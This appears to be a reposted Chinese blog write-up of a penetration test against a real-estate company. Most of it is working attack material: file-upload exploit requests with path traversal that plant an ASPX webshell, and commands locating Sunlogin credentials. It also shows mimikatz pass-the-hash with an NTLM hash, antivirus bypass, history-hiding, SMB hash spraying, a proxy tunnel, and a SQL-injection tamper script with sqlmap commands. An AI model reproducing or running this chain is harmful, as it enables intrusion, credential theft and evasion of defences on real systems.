声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
前言
入口点
POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1Host: x.x.x.xContent-Type: multipart/form-data; boundary=----WebKitFormBoundarywwk2ReqGTj7lNYltUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36------WebKitFormBoundarywwk2ReqGTj7lNYltContent-Disposition: form-data; name="File1";filename="est.aspx"Content-Type: image/jpeghello word------WebKitFormBoundarywwk2ReqGTj7lNYlt--
C:WindowsMicrosoft.NETFrameworkv4.0.30319aspnet_compiler.exe -v / -p D:test D:test2 -fixednames将马子和生成的.dll、.complied文件都上传上去
POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1Host: xxxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Content-Length: 1296Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundarywwk2ReqGTj7lNYltAccept-Encoding: gzip, deflate------WebKitFormBoundarywwk2ReqGTj7lNYltContent-Disposition: form-data; name="File1";filename="test.aspx"Content-Type: image/jpeg<%@ Page Language="C#"%><%try{string key = "3c6e0b8a9c15224a";byte[] data = new xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx------WebKitFormBoundarywwk2ReqGTj7lNYlt--
POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1Host: xxxxxxxxxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Content-Length: 529Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundarywwk2ReqGTj7lNYltAccept-Encoding: gzip, deflate------WebKitFormBoundarywwk2ReqGTj7lNYltContent-Disposition: form-data; name="File1";filename="../../../bin/test.aspx.cdcab7d2.compiled"Content-Type: image/jpeg<?xml version="1.0" encoding="utf-8"?><preserve resultType="3" virtualPath="/infotest.aspx" hash="62838a9aa" filehashxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx------WebKitFormBoundarywwk2ReqGTj7lNYlt--
POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1Host: xxxxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Content-Length: 529Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundarywwk2ReqGTj7lNYltAccept-Encoding: gzip, deflate------WebKitFormBoundarywwk2ReqGTj7lNYltContent-Disposition: form-data; name="File1";filename="../../../bin/App_Web_test.aspx.cdcab7d2"Content-Type: image/jpeg<?xml version="1.0" encoding="utf-8"?><preserve resultType="3" virtualPath="/test.aspx" hash="62838a9aa" filehashxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx------WebKitFormBoundarywwk2ReqGTj7lNYlt--
访问
http://xxx.xxx.xxx.xxx/tplus/test.aspx?preload=1成功上线哥斯拉
查看有360杀软,还有向日葵远程桌面
绿色版:C:ProgramDataOraySunloginClientconfig.ini安装版:C:Program FilesOraySunLoginSunloginClientconfig.ini注册表查询安装版:reg query HKEY_USERS.DEFAULTSoftwareOraySunLoginSunloginClientSunloginInfo绿色版:reg query HKEY_USERS.DEFAULTSoftwareOraySunLoginSunloginClientSunloginGreenInfo简约版:reg query HKEY_USERS.DEFAULTSoftwareOraySunLoginSunloginClientSunloginLiteInfo
encry_pwd为本机验证码,为密文,不可解密fastcode为本机识别码,为明文https://github.com/wafinfo/Sunflower_get_Password
内网
还有几台ssh弱口令,和一台smb弱口令
内网好多资产可以深入,重点是能横移到域里面的机子
先弄个代理将流量送到内网去,cs自带的socks代理是非常难用的,上传ew,执行的时候还是被denied了
无奈用cs自带的socks代理试试,不行,无法访问内网应用
上传frp、venom等代理工具,执行的时候通通被denied,我寻思你是只允许fscan执行是吧,其他应用通通拦截
转个会话到msf,使用msf的socks的代理也同样不行,看来得把杀软关掉
试了几个驱动来干掉360都失败了,试着添加用户也被拦截了
通过不断尝试终于绕过了360,成功添加用户
打开远程桌面
portfwd add -l 3389 -r 127.0.0.1 -p 3389
但使用新建的用户登陆时,还是失败了,提示不能加载用户的配置文件,怀疑通过这个办法新建的用户有问题
privilege::debugsekurlsa::pth /user:administrator /domain:WIN-E623EEREKAE /ntlm:e2119365a7ce84de9de6e6ff9bdea690 "/run:mstsc.exe /restrictedadmin"
随后会弹出一个mstsc窗口,直接点击登陆就行
成功登陆进来,手动退掉360相关安全防护软件
现在来执行venom开启代理就能执行成功了,果然是被360给拦截了,我很好奇他怎么不拦fscan
#服务器执行/admin_linux_x64 -lport 8085#客户端执行agent.exe -rhost xxx.xxx.xxx.xxx -rport 8085goto 1 #进入节点1socks 8050 #开启socks5代理
配置proxychains.conf,先连接那个几ssh弱口令看看
空格set +o history
ff.exe -h x.x.x.x/16 -m smb -pwdf d.txt
fscan.exe -h x.x.x.x/16 -m smb2 -user administrator -hash e2119365a7ce84de9de6e6ff9bdea690喷洒出了3台,但还是一台都没成功
bp挂个上游代理测试一波a' union select 1,''+(select @@version)+'import osdef main():clearFlag = "y"while(1):if clearFlag == "y" or clearFlag == "Y":os.system("cls")clearFlag = ""string = input("请输入需要转换的字符串 :")for i in range(3):string = encode(string)encode_string = stringprint("编码结果为:"+encode_string+"n")#编码def encode(string):encode_string = ""for char in string:encode_char = hex(ord(char)).replace("0x","%")encode_string += encode_charreturn encode_stringmain()
def enc_url(payload):encode_string = ""for char in payload:encode_char = hex(ord(char)).replace("0x","%")encode_string += encode_charreturn encode_stringdef tamper(payload,**kwargs):url_encode = payloadstr_url = ""for i in range(3):url_encode=enc_url(url_encode)str_url = url_encodereturn str_url
使用sqlmap挂上代理开跑
sqlmap -r ~/sql2.txt --tamper E-Cology-sql.py --dbms=mssql -proxy socks5://x.x.x.x:8050 --random-agent --timeout 10 --level 5 -p keyword --risk=2没跑出来,使用sqlmap的前缀后缀参数
sqlmap -r ~/sql2.txt --tamper E-Cology-sql.py --dbms=mssql -proxy socks5://x.x.x.x:8050 --random-agent --timeout 10 -p keyword --prefix="a' union select 1,''+(" --suffix=")+'" --level=5 --risk=2成功跑出来,但在执行--os-shell和--os-cmd时报错
使用手工来进行操作,sqlserver执行命令的那几种方法都试了,都无法执行命令。
也尝试了网上一些绕过mssql无法执行命令的方法,都失败了
得嘞,路又堵死了,累了,不再深入,干饭。
总结
https://xz.aliyun.com/t/12508|
原文始发于微信公众号(湘安无事):记一次对某地产集团的一次渗透测试
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论